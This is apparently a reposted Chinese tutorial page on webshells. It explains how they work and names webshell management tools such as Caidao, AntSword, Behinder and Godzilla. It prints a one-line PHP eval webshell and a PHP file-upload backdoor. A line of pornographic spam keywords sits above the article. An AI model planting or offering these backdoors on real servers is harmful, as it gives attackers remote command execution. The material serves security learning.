国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

web安全第四天:webshell原理與菜刀使用

這篇具有很好參考價(jià)值的文章主要介紹了web安全第四天:webshell原理與菜刀使用。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

webshell原理

1.1 WebShell的含義

WebShell就是以asp、php、jsp或者cgi等網(wǎng)頁文件形式存在的一種命令執(zhí)行環(huán)境,也可以將其稱做為一種網(wǎng)頁后門。黑客在入侵了一個(gè)網(wǎng)站后,通常會(huì)將asp或php后門文件與網(wǎng)站服務(wù)器WEB目錄下正常的網(wǎng)頁文件混在一起,然后就可以使用瀏覽器來訪問asp或者php后門,得到一個(gè)命令執(zhí)行環(huán)境,以達(dá)到控制網(wǎng)站服務(wù)器的目的。

1.2 WebShell的優(yōu)點(diǎn)

WebShell最大的優(yōu)點(diǎn)就是可以穿越防火墻,由于與被控制的服務(wù)器或遠(yuǎn)程主機(jī)交換的數(shù)據(jù)都是通過8O0端口傳遞的,因此不會(huì)被防火墻攔截。并且使用WebShell一般不會(huì)在系統(tǒng)日志中留下記錄只會(huì)在網(wǎng)站的web日志中 留下一些數(shù)據(jù)提交記錄,沒有經(jīng)驗(yàn)的管理員是很難看出入侵痕跡的。

1.3 WebShell的分類

WebShell根據(jù)腳本可以分為PHP腳本木馬,ASP腳本木馬,也有基于.NET的腳本木馬和JSP腳本木馬。跟隨時(shí)代和技術(shù)的變遷,國(guó)外也有用python編寫的腳本木馬,不過國(guó)內(nèi)常用的無外乎三種,大馬,小馬,一句話木馬,具體使用場(chǎng)景和特點(diǎn)如下圖:
菜刀連接webshell,php,開發(fā)語言

1.3.1一句話木馬

代碼簡(jiǎn)短,通常只有一行代碼,使用方便。
PHP: <?php eval($_GET[pass]);?>

菜刀連接webshell,php,開發(fā)語言

1.3.2 小馬

只包含文件上傳功能,體積小。

< ?php
@$temp = $_FILES[ ' upload_file'][ 'tmp_name ' ];
@$file = basename($_FILES[ ' upload_file' ][ 'name ' ]);
if ( empty ($file) ){
	echo "<form action = '' method = 'POST'ENCTYPE='multipart/form-data'>\n";
	echo "Local file: <input type = 'file' name = 'upload_file ' >\n";
	echo "<input type = 'submit' value = 'upload ' > \n";
	echo "</form> \n<pre> \n\n</pre>" ;
}else {
	if(move_uploaded_file($temp , $file)){
		echo "File uploaded successfully.<p> \n"}
	else {
		echo "Unable to upload " . $file . ".<p>n"; }
		}?>
1.3.3 大馬

體積大,包含很多功能,代碼通常會(huì)進(jìn)行加密隱藏。
菜刀連接webshell,php,開發(fā)語言

1.4 WebShell原理拋析

首先我們先看一個(gè)原始而又簡(jiǎn)單的php一句話木馬:

<?php @eval($_POST['a']);?>

(1) php的代碼要寫在<?php ?>里面,服務(wù)器才能認(rèn)出來這是php代碼,然后才去解析。

(2)@符號(hào)的意思是不報(bào)錯(cuò),即使執(zhí)行錯(cuò)誤,也不報(bào)錯(cuò)。

(3)為什么密碼是a呢?
php里面幾個(gè)超全局變量:$_GET、$_POST就是其中之一。$_POST[a];的意思就是a這個(gè)變量,用post的方法接收。

(4)如何理解eval()函數(shù)?
eval()把字符串作為PHP代碼執(zhí)行。
例如: eval(“echo 'a”");其實(shí)就等于直接echo ‘a(chǎn)’;再來看看<?php eval($_POST[a'); ?>首先,用post方式接收變量a,比如接收到了: a=echo 'a;這時(shí)代碼就變成<?php eval("echo 'a';"); ?>。結(jié)果如下:

菜刀連接webshell,php,開發(fā)語言

1.2.1 WebShell管理工具的誕生

攻擊者在入侵網(wǎng)站時(shí),通常要通過各種方式寫入WebShell,從而獲得服務(wù)器的控制權(quán)限,比如執(zhí)行系統(tǒng)命令.讀取配置文件、竊取用戶數(shù)據(jù),篡改網(wǎng)站頁面等操作。為了方便對(duì)這些WebShell進(jìn)行管理,就誕生了各種各樣的WebShell管理工具。

菜刀原理

2.1菜刀工作原理

以虛擬終端執(zhí)行命令
菜刀連接webshell,php,開發(fā)語言

常見webshell管理工具

3.1中國(guó)蟻劍

中國(guó)蟻劍是一款開源的跨平臺(tái)網(wǎng)站管理工具,它主要面向于合法授權(quán)的滲透測(cè)試安全人員以及進(jìn)行常規(guī)操作的網(wǎng)站管理員。
項(xiàng)目地址: https:/lgithub.com/AntSwordProject/AntSword-Loader

3.2冰蝎

冰蝎通信過程中使用AES(高級(jí)加密算法,對(duì)稱加密,微信小程序使用此種方法)進(jìn)行加密,Java和.NET默認(rèn)支持AES, php中需要開啟openssl擴(kuò)展,在V2.0版本后,php環(huán)境方式根據(jù)服務(wù)端支持情況動(dòng)態(tài)選擇,使得冰蝎更強(qiáng)大。
項(xiàng)目地址: https://github.com/rebeyond/Behinder

3.3哥斯拉

護(hù)網(wǎng)期間,各大廠商的waf不斷,在靜態(tài)查殺、流量通信等方面對(duì)webshell進(jìn)行攔截,眾紅隊(duì)急需一款優(yōu)秀的權(quán)限管理工具,冰蝎3.0的發(fā)布可能緩解了流量加密的困境,但是冰蝎3.0的bug眾多,很多朋友甚至連不上冰蝎的shell,于是@BeichenDream決定公開他所開發(fā)的一款shell權(quán)限管理工具,名為“哥斯拉”。
項(xiàng)目地址: https://github.com/BeichenDream/Godzilla文章來源地址http://www.zghlxwxcb.cn/news/detail-738644.html

到了這里,關(guān)于web安全第四天:webshell原理與菜刀使用的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • webshell管理工具的流量特征分析(菜刀、蟻劍、冰蝎、哥斯拉)

    目錄 寫在前面 菜刀 蟻劍? 冰蝎? 冰蝎2.0 冰蝎3.0? 冰蝎4.0? 哥斯拉? 菜刀、蟻劍、冰蝎、哥斯拉是常見的webshell管理工具。在攻防演練中,了解其常見webshell管理工具的流量特征對(duì)防守方來說十分重要。常見的webshell也在不斷發(fā)展以繞過安全設(shè)備waf的檢測(cè),其流量特征也在不斷

    2024年02月13日
    瀏覽(44)
  • 菜刀、蟻劍以及冰蝎三款Webshell管理工具簡(jiǎn)介

    菜刀、蟻劍以及冰蝎三款Webshell管理工具簡(jiǎn)介

    今天繼續(xù)給大家介紹滲透測(cè)試相關(guān)知識(shí),本文主要內(nèi)容是菜刀、蟻劍以及冰蝎三款Webshell管理工具簡(jiǎn)介。 免責(zé)聲明: 本文所介紹的內(nèi)容僅做學(xué)習(xí)交流使用,嚴(yán)禁利用文中技術(shù)進(jìn)行非法行為,否則造成一切嚴(yán)重后果自負(fù)! 再次強(qiáng)調(diào):嚴(yán)禁對(duì)未授權(quán)設(shè)備進(jìn)行滲透測(cè)試! 當(dāng)前,在

    2024年02月06日
    瀏覽(22)
  • 滲透測(cè)試-菜刀冰蝎蟻劍哥斯拉等webshell工具及特征分析

    滲透測(cè)試-菜刀冰蝎蟻劍哥斯拉等webshell工具及特征分析

    在測(cè)試過程中,我們經(jīng)常會(huì)運(yùn)到各種webshell管理工具,這里我介紹幾種常見的webshell工具給大家。 webshell就是以asp、php、jsp或者cgi等網(wǎng)頁文件形式存在的一種代碼執(zhí)行環(huán)境,主要用于網(wǎng)站管理、服務(wù)器管理、權(quán)限管理等操作。使用方法簡(jiǎn)單,只需上傳一個(gè)代碼文件,通過網(wǎng)址訪

    2024年02月16日
    瀏覽(21)
  • 二進(jìn)制加密PHP Webshell原理及簡(jiǎn)單實(shí)現(xiàn)

    二進(jìn)制加密PHP Webshell原理及簡(jiǎn)單實(shí)現(xiàn)

    今天繼續(xù)給大家介紹滲透測(cè)試相關(guān)知識(shí),本文主要內(nèi)容是二進(jìn)制加密PHP Webshell原理及簡(jiǎn)單實(shí)現(xiàn)。 免責(zé)聲明: 本文所介紹的內(nèi)容僅做學(xué)習(xí)交流使用,嚴(yán)禁利用文中技術(shù)進(jìn)行非法行為,否則造成一切嚴(yán)重后果自負(fù)! 再次強(qiáng)調(diào):嚴(yán)禁對(duì)未授權(quán)設(shè)備進(jìn)行滲透測(cè)試! 為了躲避WAF、殺軟

    2023年04月09日
    瀏覽(26)
  • 網(wǎng)絡(luò)安全02--負(fù)載均衡下的webshell連接

    網(wǎng)絡(luò)安全02--負(fù)載均衡下的webshell連接

    目錄 一、環(huán)境準(zhǔn)備 1.1ubentu虛擬機(jī)一臺(tái),docker環(huán)境,蟻劍 1.2環(huán)境壓縮包(文件已上傳資源): 二、開始復(fù)原 2.1上傳ubentu: 2.2解壓縮 2.3版本20沒有docker-compose手動(dòng)下載,包已上傳資源 ?編輯?2.4問題:下載無法連接 2.5解決方法:ubentu上做代理,或xftp自己上傳,我這里使用ub

    2024年02月19日
    瀏覽(16)
  • CTF-Crypto學(xué)習(xí)記錄-第四天 “ “ --- SHA1安全散列算法,實(shí)現(xiàn)原理。

    CTF-Crypto學(xué)習(xí)記錄-第四天 “ “ --- SHA1安全散列算法,實(shí)現(xiàn)原理。

    MD5學(xué)習(xí)MD5加密算法 SHA-1(Secure Hash Algorithm1,安全散列算法1)是一種密碼散列函數(shù)。 SHA-1可以生成一個(gè)被稱為消息摘要的160位(20字節(jié))散列值,散列值通常的呈現(xiàn)形式為40個(gè)十六進(jìn)制數(shù)。 SHA-1的歷史: 2005年,密碼分析人員發(fā)現(xiàn)了對(duì)SHA-1的有效攻擊方法,這表明該算法可能不夠

    2024年02月07日
    瀏覽(22)
  • Webshell免殺-PHP

    Webshell免殺-PHP

    ????????在很多滲透測(cè)試?yán)玫倪^程中,滲透人員會(huì)通過上傳webshell的方式來獲取目標(biāo)服務(wù)器的權(quán)限。然而及時(shí)webshell文件能夠正常上傳,后續(xù)有可能會(huì)被管理員當(dāng)作木馬文件刪除,上傳的過程中也會(huì)被安全設(shè)備攔截,因此對(duì)webshell文件進(jìn)行免殺操作是不可或缺的。本處僅對(duì)

    2023年04月25日
    瀏覽(19)
  • web安全php基礎(chǔ)_搭建php環(huán)境

    web安全php基礎(chǔ)_搭建php環(huán)境

    首先打開phpstudy的網(wǎng)站欄點(diǎn)擊創(chuàng)建網(wǎng)站,新建一個(gè)網(wǎng)站(域名隨便輸反正是局域網(wǎng))然后點(diǎn)擊確認(rèn) 如下,網(wǎng)站便創(chuàng)建好了 打開瀏覽器輸入剛剛創(chuàng)建網(wǎng)站時(shí)輸入的域名,即可看見我們的網(wǎng)站 然后網(wǎng)站好了,就可以新建項(xiàng)目,打開phpstorm,然后點(diǎn)擊new project新建項(xiàng)目, 然后在loca

    2024年02月13日
    瀏覽(27)
  • web安全php基礎(chǔ)_php數(shù)據(jù)類型

    web安全php基礎(chǔ)_php數(shù)據(jù)類型

    PHP 支持以下幾種數(shù)據(jù)類型: String(字符串) Integer(整型) Float(浮點(diǎn)型) Boolean(布爾型) Array(數(shù)組) Object(對(duì)象) NULL(空值) Resource(資源類型) PHP 字符串 一個(gè)字符串是一串字符的序列,就像 “Hello world!”。 可以將任何文本放在單引號(hào)和雙引號(hào)中: 執(zhí)行效果如下

    2024年02月12日
    瀏覽(23)
  • Web安全——PHP基礎(chǔ)

    Web安全——PHP基礎(chǔ)

    PHP (全稱: PHP : Hypertext Preprocessor ,即\\\" PHP : 超文本預(yù)處理器 \\\")是一種通用 開源腳本語言 。 在一個(gè)php文件中可以包括以下內(nèi)容: PHP 文件可包含文本、 HTML 、 JavaScript 代碼和 PHP 代碼 PHP 代碼 在服務(wù)器上執(zhí)行 ,結(jié)果以純 HTML 形式返回給瀏覽器 PHP 文件的 默認(rèn)文件擴(kuò)展名

    2024年02月11日
    瀏覽(22)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包